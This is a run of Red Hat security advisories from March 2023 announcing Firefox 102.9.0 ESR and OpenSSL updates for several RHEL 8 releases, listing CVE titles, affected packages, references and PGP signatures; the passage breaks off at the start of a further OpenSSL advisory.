Red Hat Security Advisory 2023-1445-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1445-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1445  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
firefox-102.9.0-4.el8_2.src.rpm

aarch64:  
firefox-102.9.0-4.el8_2.aarch64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.aarch64.rpm  
firefox-debugsource-102.9.0-4.el8_2.aarch64.rpm

ppc64le:  
firefox-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debuginfo-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debugsource-102.9.0-4.el8_2.ppc64le.rpm

s390x:  
firefox-102.9.0-4.el8_2.s390x.rpm  
firefox-debuginfo-102.9.0-4.el8_2.s390x.rpm  
firefox-debugsource-102.9.0-4.el8_2.s390x.rpm

x86_64:  
firefox-102.9.0-4.el8_2.x86_64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.x86_64.rpm  
firefox-debugsource-102.9.0-4.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
firefox-102.9.0-4.el8_2.src.rpm

aarch64:  
firefox-102.9.0-4.el8_2.aarch64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.aarch64.rpm  
firefox-debugsource-102.9.0-4.el8_2.aarch64.rpm

ppc64le:  
firefox-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debuginfo-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debugsource-102.9.0-4.el8_2.ppc64le.rpm

s390x:  
firefox-102.9.0-4.el8_2.s390x.rpm  
firefox-debuginfo-102.9.0-4.el8_2.s390x.rpm  
firefox-debugsource-102.9.0-4.el8_2.s390x.rpm

x86_64:  
firefox-102.9.0-4.el8_2.x86_64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.x86_64.rpm  
firefox-debugsource-102.9.0-4.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
firefox-102.9.0-4.el8_2.src.rpm

aarch64:  
firefox-102.9.0-4.el8_2.aarch64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.aarch64.rpm  
firefox-debugsource-102.9.0-4.el8_2.aarch64.rpm

ppc64le:  
firefox-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debuginfo-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debugsource-102.9.0-4.el8_2.ppc64le.rpm

s390x:  
firefox-102.9.0-4.el8_2.s390x.rpm  
firefox-debuginfo-102.9.0-4.el8_2.s390x.rpm  
firefox-debugsource-102.9.0-4.el8_2.s390x.rpm

x86_64:  
firefox-102.9.0-4.el8_2.x86_64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.x86_64.rpm  
firefox-debugsource-102.9.0-4.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7dzjgjWX9erEAQixHg//RWiaOesinr2/sJLEG5HsiPRSNlVGLKDs  
Vz4jRqnM+E1ssJ81zR9IAacb2tRFroYIWfJzCfy3N+gnyJ6MZa8fXmf9P955tNNm  
zTWvRp3pqm6pDDS5wuL/26lMEQu+UwCOIWV7av3QfLTNoNhmUXvQNlcgy5Aamq9m  
WSLdIxNEA+cmeEHuxfaG8vj6lXPH7WtuZ06dB1YP+x8d09HbWrIgSPjVstefEN1A  
vDNrFeYfDeFM/lI6PM50M837fAuUYmcndp5NOn0f3qWtVcCRRFFDED/tPgtjQfN9  
g5Ot+d39s7RILw999HHFg9kNZowjxvs+u/YQJogcUVJd0jZ3hW1Bg6pGwLYs2sBq  
vp4HXNT+xYkXzvDgcO94Sj/lU8jLPJjbUkmISLNjxHdqYDKSza5yrTTucvB/+ZmG  
TeSiyNhy4+XireUkz2IO6n16ZrtbK0KrHERPvSeTXQZ8x5OpScfUvcPLrLe8/AbL  
Tazrl1LJskPWYqLaEQH1M9zhSnAQgUcrva3pIJFIwDZDz3Hzwhur/3o3knVhGWyG  
shNGxJW27BowQrfT2rTJc3RkHCjSHL2QgB5ZHmpZl9p6wxTLlUN8sgP3eTg41zzd  
iPZgpyWgjzOyzTFXB8MCdGzIMDgltpAkNN4e6jRGXTS4QDCzpl4sFW8GM44hiUDp  
v1BFUoMfblo=s9X6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1445-01

Red Hat Security Advisory 2023-1444-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1444-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1444  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
firefox-102.9.0-4.el8_4.src.rpm

aarch64:  
firefox-102.9.0-4.el8_4.aarch64.rpm  
firefox-debuginfo-102.9.0-4.el8_4.aarch64.rpm  
firefox-debugsource-102.9.0-4.el8_4.aarch64.rpm

ppc64le:  
firefox-102.9.0-4.el8_4.ppc64le.rpm  
firefox-debuginfo-102.9.0-4.el8_4.ppc64le.rpm  
firefox-debugsource-102.9.0-4.el8_4.ppc64le.rpm

s390x:  
firefox-102.9.0-4.el8_4.s390x.rpm  
firefox-debuginfo-102.9.0-4.el8_4.s390x.rpm  
firefox-debugsource-102.9.0-4.el8_4.s390x.rpm

x86_64:  
firefox-102.9.0-4.el8_4.x86_64.rpm  
firefox-debuginfo-102.9.0-4.el8_4.x86_64.rpm  
firefox-debugsource-102.9.0-4.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7dzjgjWX9erEAQjFAw/+POMLis7JDkGsJrJysMHCnABjVMQOFj2o  
eTv2yQG5FekOOXpbeoR9hNWZmI3EKQ6weJtRSKqcPZHC5vBpoTLAPr1gJ8r6eR6f  
msbEAczb9Qx2b5f6b95bvnWrrdVDOV+hso1QTJZhSSXWtcdiHgX3RnyUx3kvqcCx  
v9aib86RhZBKBt6IsXpNOFjKzR9tGXghHgN6tUrvc1h894GmcC4yjZj5jAcwzyQS  
gOytV4CjzZnfUaU0J2mOs5KW+nt0zmhMC9U/hHBeS5WWGfO4w+psk79GoZi0MBzQ  
DWehVqtblQWO/4eYRnAm2kfKlV9wKoRAXnZfSKfLE2we+R5csIxFNXCSjhXf94c5  
cvNZiLisQj3qDlo0tEZZSNUYV+CUs5Ay2W2ultkBVTqkWcJSwygW+9Ff0SCxTZUA  
1nciKqoCCdc7sh5cy7lyR7S73gDWp1iPpg+1zrEpsrSIQ8pKSmeoXFyKO/ALiEai  
qlCkpjM91uUipDDFuvSC6EyQPmwYzyo3BfPe33pK+eIhDxNnTx8J7aVgH/dfvY7U  
OHkHWWZfzM68zGhFa1ddA2HwghNGVn//g+xrG9U1QJzf83hcLkC6NxIfmkfJODom  
yRgo93DpoCuOtPYp2I8oCEyncmB0D3YOWDzn+k5+BQH7V5dAeHMRiiELjs14Tnqo  
50sdrHMYz/g£8J  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1444-01

Red Hat Security Advisory 2023-1437-01 - OpenSSL is a toolkit that implements the Secure Sockets Layer and Transport Layer Security protocols, as well as a full-strength general-purpose cryptography library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openssl security update  
Advisory ID:       RHSA-2023:1437-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1437  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-0286  
====================================================================  
1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and  
Transport Layer Security (TLS) protocols, as well as a full-strength  
general-purpose cryptography library.

Security Fix(es):

* openssl: X.400 address type confusion in X.509 GeneralName  
(CVE-2023-0286)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2164440 - CVE-2023-0286 openssl: X.400 address type confusion in X.509 GeneralName

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
openssl-1.1.1c-6.el8_1.src.rpm

aarch64:  
openssl-1.1.1c-6.el8_1.aarch64.rpm  
openssl-debuginfo-1.1.1c-6.el8_1.aarch64.rpm  
openssl-debugsource-1.1.1c-6.el8_1.aarch64.rpm  
openssl-devel-1.1.1c-6.el8_1.aarch64.rpm  
openssl-libs-1.1.1c-6.el8_1.aarch64.rpm  
openssl-libs-debuginfo-1.1.1c-6.el8_1.aarch64.rpm  
openssl-perl-1.1.1c-6.el8_1.aarch64.rpm

ppc64le:  
openssl-1.1.1c-6.el8_1.ppc64le.rpm  
openssl-debuginfo-1.1.1c-6.el8_1.ppc64le.rpm  
openssl-debugsource-1.1.1c-6.el8_1.ppc64le.rpm  
openssl-devel-1.1.1c-6.el8_1.ppc64le.rpm  
openssl-libs-1.1.1c-6.el8_1.ppc64le.rpm  
openssl-libs-debuginfo-1.1.1c-6.el8_1.ppc64le.rpm  
openssl-perl-1.1.1c-6.el8_1.ppc64le.rpm

s390x:  
openssl-1.1.1c-6.el8_1.s390x.rpm  
openssl-debuginfo-1.1.1c-6.el8_1.s390x.rpm  
openssl-debugsource-1.1.1c-6.el8_1.s390x.rpm  
openssl-devel-1.1.1c-6.el8_1.s390x.rpm  
openssl-libs-1.1.1c-6.el8_1.s390x.rpm  
openssl-libs-debuginfo-1.1.1c-6.el8_1.s390x.rpm  
openssl-perl-1.1.1c-6.el8_1.s390x.rpm

x86_64:  
openssl-1.1.1c-6.el8_1.x86_64.rpm  
openssl-debuginfo-1.1.1c-6.el8_1.i686.rpm  
openssl-debuginfo-1.1.1c-6.el8_1.x86_64.rpm  
openssl-debugsource-1.1.1c-6.el8_1.i686.rpm  
openssl-debugsource-1.1.1c-6.el8_1.x86_64.rpm  
openssl-devel-1.1.1c-6.el8_1.i686.rpm  
openssl-devel-1.1.1c-6.el8_1.x86_64.rpm  
openssl-libs-1.1.1c-6.el8_1.i686.rpm  
openssl-libs-1.1.1c-6.el8_1.x86_64.rpm  
openssl-libs-debuginfo-1.1.1c-6.el8_1.i686.rpm  
openssl-libs-debuginfo-1.1.1c-6.el8_1.x86_64.rpm  
openssl-perl-1.1.1c-6.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7dzjgjWX9erEAQj2fBAAonoENVQK1z0o1faaI5kJcpcjudplrNTx  
CWn5Q1bA7ZOU+8F4kocdGWUHfF7IIFHmcV/bfkz0pyOEx14pHdi4gbfp7DHMg+vh  
TnJBtCqCJVGWmoDu4qUzm81w96lSgRTFweoMdk8DZL8GBfPF7ZW4q46A8oBCxkXC  
jQ1gAhHZEfeDKCSsQ+JJvtjSZdAKCf3iDimy6FMFHDLg9hqXns+UXZ+7mJD3UpLP  
gqfzM8a1+YonxtC1piovlY7KaWV7EpgufVCzILjwXiLeKivfUo4SGDdw+fsv5rzr  
ex1qOKg9mucu3nq5eoZaOomtrvhFW9P8igS1aZVWNcdhv/nbYBkhUZ04U9wwnOru  
t5936OJzyl5gQxKTA3RCX45z4qs6TUE07DB4LYSrmXj1yQXZcwahJIB5/N63ttbn  
pqt04m9xLybFsn2+8TCOiBwfZUkrKsoepjBVrqcC05yfL41fsoZao7ZwLSiptByZ  
UO5Xy4wUQjOIRCqUkquE2GidOhVdIvQhrjOj2tsaW3vHSXsYLICBxru5fOTKsNdz  
fKdIDy0S62gU2QQeSWBukCIZTnWw7sfxWZJ1p4M//JgbA5njA59iBTv+zNSQ93pr  
I/GPiwNZInjgIWFPaUkrvn0O5VejKPb+i6Mz5ACd8GJPWOFxjxDCbnarqAlaMi7D  
s7TQu68jDN4ÏEA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1437-01

Red Hat Security Advisory 2023-1439-01 - OpenSSL is a toolkit that implements the Secure Sockets Layer and Transport Layer Security protocols, as well as a full-strength general-purpose cryptography library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openssl security update  
Advisory ID:       RHSA-2023:1439-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1439  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-0286  
====================================================================  
1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS AUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and  
Transport Layer Security (TLS) protocols, as well as a full-strength  
general-purpose cryptography library.

Security Fix(es):

* openssl: X.400 address type confusion in X.509 GeneralName  
(CVE-2023-0286)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2164440 - CVE-2023-0286 openssl: X.400 address type confusion in X.509 GeneralName

6. Package List:

Red Hat Enterprise Linux BaseOS AUS (v. 8.2):

Source:  
openssl-1.1.1c-21.el8_2.src.rpm

aarch64:  
openssl-1.1.1c-21.el8_2.aarch64.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.aarch64.rpm  
openssl-debugsource-1.1.1c-21.el8_2.aarch64.rpm  
openssl-devel-1.1.1c-21.el8_2.aarch64.rpm  
openssl-libs-1.1.1c-21.el8_2.aarch64.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.aarch64.rpm  
openssl-perl-1.1.1c-21.el8_2.aarch64.rpm

ppc64le:  
openssl-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-debugsource-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-devel-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-libs-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-perl-1.1.1c-21.el8_2.ppc64le.rpm

s390x:  
openssl-1.1.1c-21.el8_2.s390x.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.s390x.rpm  
openssl-debugsource-1.1.1c-21.el8_2.s390x.rpm  
openssl-devel-1.1.1c-21.el8_2.s390x.rpm  
openssl-libs-1.1.1c-21.el8_2.s390x.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.s390x.rpm  
openssl-perl-1.1.1c-21.el8_2.s390x.rpm

x86_64:  
openssl-1.1.1c-21.el8_2.x86_64.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.i686.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.x86_64.rpm  
openssl-debugsource-1.1.1c-21.el8_2.i686.rpm  
openssl-debugsource-1.1.1c-21.el8_2.x86_64.rpm  
openssl-devel-1.1.1c-21.el8_2.i686.rpm  
openssl-devel-1.1.1c-21.el8_2.x86_64.rpm  
openssl-libs-1.1.1c-21.el8_2.i686.rpm  
openssl-libs-1.1.1c-21.el8_2.x86_64.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.i686.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.x86_64.rpm  
openssl-perl-1.1.1c-21.el8_2.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
openssl-1.1.1c-21.el8_2.src.rpm

aarch64:  
openssl-1.1.1c-21.el8_2.aarch64.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.aarch64.rpm  
openssl-debugsource-1.1.1c-21.el8_2.aarch64.rpm  
openssl-devel-1.1.1c-21.el8_2.aarch64.rpm  
openssl-libs-1.1.1c-21.el8_2.aarch64.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.aarch64.rpm  
openssl-perl-1.1.1c-21.el8_2.aarch64.rpm

ppc64le:  
openssl-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-debugsource-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-devel-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-libs-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-perl-1.1.1c-21.el8_2.ppc64le.rpm

s390x:  
openssl-1.1.1c-21.el8_2.s390x.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.s390x.rpm  
openssl-debugsource-1.1.1c-21.el8_2.s390x.rpm  
openssl-devel-1.1.1c-21.el8_2.s390x.rpm  
openssl-libs-1.1.1c-21.el8_2.s390x.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.s390x.rpm  
openssl-perl-1.1.1c-21.el8_2.s390x.rpm

x86_64:  
openssl-1.1.1c-21.el8_2.x86_64.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.i686.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.x86_64.rpm  
openssl-debugsource-1.1.1c-21.el8_2.i686.rpm  
openssl-debugsource-1.1.1c-21.el8_2.x86_64.rpm  
openssl-devel-1.1.1c-21.el8_2.i686.rpm  
openssl-devel-1.1.1c-21.el8_2.x86_64.rpm  
openssl-libs-1.1.1c-21.el8_2.i686.rpm  
openssl-libs-1.1.1c-21.el8_2.x86_64.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.i686.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.x86_64.rpm  
openssl-perl-1.1.1c-21.el8_2.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v. 8.2):

Source:  
openssl-1.1.1c-21.el8_2.src.rpm

aarch64:  
openssl-1.1.1c-21.el8_2.aarch64.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.aarch64.rpm  
openssl-debugsource-1.1.1c-21.el8_2.aarch64.rpm  
openssl-devel-1.1.1c-21.el8_2.aarch64.rpm  
openssl-libs-1.1.1c-21.el8_2.aarch64.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.aarch64.rpm  
openssl-perl-1.1.1c-21.el8_2.aarch64.rpm

ppc64le:  
openssl-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-debugsource-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-devel-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-libs-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.ppc64le.rpm  
openssl-perl-1.1.1c-21.el8_2.ppc64le.rpm

s390x:  
openssl-1.1.1c-21.el8_2.s390x.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.s390x.rpm  
openssl-debugsource-1.1.1c-21.el8_2.s390x.rpm  
openssl-devel-1.1.1c-21.el8_2.s390x.rpm  
openssl-libs-1.1.1c-21.el8_2.s390x.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.s390x.rpm  
openssl-perl-1.1.1c-21.el8_2.s390x.rpm

x86_64:  
openssl-1.1.1c-21.el8_2.x86_64.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.i686.rpm  
openssl-debuginfo-1.1.1c-21.el8_2.x86_64.rpm  
openssl-debugsource-1.1.1c-21.el8_2.i686.rpm  
openssl-debugsource-1.1.1c-21.el8_2.x86_64.rpm  
openssl-devel-1.1.1c-21.el8_2.i686.rpm  
openssl-devel-1.1.1c-21.el8_2.x86_64.rpm  
openssl-libs-1.1.1c-21.el8_2.i686.rpm  
openssl-libs-1.1.1c-21.el8_2.x86_64.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.i686.rpm  
openssl-libs-debuginfo-1.1.1c-21.el8_2.x86_64.rpm  
openssl-perl-1.1.1c-21.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7NzjgjWX9erEAQh6gw//WJqLt9YyobqWOBG/NpiC73QzLQWHbVIh  
QPwDMXRYgHGUynZzutvtJsO2wAuWlplIdvKkHQRqYBFLJBVjZMz1PzgFm5EWZiY9  
4VNXNiP95rAU/IyhBqJKiHMtIfqmQPhO9DD/BKafUjc54umAowSBmZyHL5LnCtka  
XApVLo035R1mwUNWQsc0pOULWRDNKoYjZE7QR9ioUkQKSNC9zBgUXnS08uPh7BHD  
HjxsugjqH/3HNaLzF+56oKmFsZpbw9ZSnOfoM8pqBl1+A7twToR/8VvEKfvfhbid  
v+PaAH7SQcavJq7ot9p9dpNvfd161QXtK9tQXmbNC/WLSY3pYy4ju7GdDfedeS45  
63tDSkN1TVTiZnYJ4DcvEovWKfERLfw0ejdn0vQwAEHYEVlqFGsGMDFsHw3QTMGN  
hF8ynU/OB+pXOe2/V0PTvXix1c9NemE3jejQH/+I54TJTv0MWtSpq9jVTwGiqEFl  
oNoO4TQqPWHhOhfPYy7Kwom200ND6PKsiHdfSNlpB7SWbWXsvscY6Bn9JN8E9rff  
ubQcuoFR/9i8t9hoj2mPr/vcAqc5l/g75KwhHZD870gwuf7BgzOWQdmGlmA8KKRx  
9qmiwEZxPbQ0GL4hFX3H5LKntkt8w6DlhCXQzlM7cWZHI7M5jj7mxjlYJ4EDRC5C  
NZEzG8SUmpA=Knf2  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1439-01

Red Hat Security Advisory 2023-1441-01 - OpenSSL is a toolkit that implements the Secure Sockets Layer and Transport Layer Security protocols, as well as a full-strength general-purpose cryptography library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
